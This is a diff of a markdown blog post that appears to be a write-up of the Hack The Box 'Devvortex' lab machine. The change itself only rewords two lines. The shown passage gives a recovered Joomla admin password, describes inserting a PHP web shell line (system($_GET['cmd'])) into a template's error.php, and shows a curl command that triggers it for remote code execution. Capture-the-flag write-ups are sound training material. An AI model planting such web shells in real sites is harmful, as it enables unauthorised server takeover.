julio-cfa/julio-cfa.github.io/blog/write-ups/machines-devvortex.md

 }
 ```

 <p>User "lewis" seems to have the password "P4ntherg0t1n5r3c0n##".
-We can use it to successfully login on "/administrator".
+We can use it to successfully login to Joomla on "/administrator".
 We tried to SSH into the machine as well with these credentials but it did not work.</p>

 <p>After logging into Joomla, Lewis seems to be part of the super users - which means that we have administrator privileges.
 We can go to "System > Templates > Site Templates > Cassiopedia Details and Files > error.php".
 We can then add <custom-code>system($_GET['cmd']);</custom-code> to second line of the code.</p>

-<p>To finally achieve RCE, we can run:</p>
+<p>To finally achieve remote code execution (RCE), we can run:</p>

 ```bash
 curl -s "http://dev.devvortex.htb/templates/cassiopeia/error.php?cmd=whoami"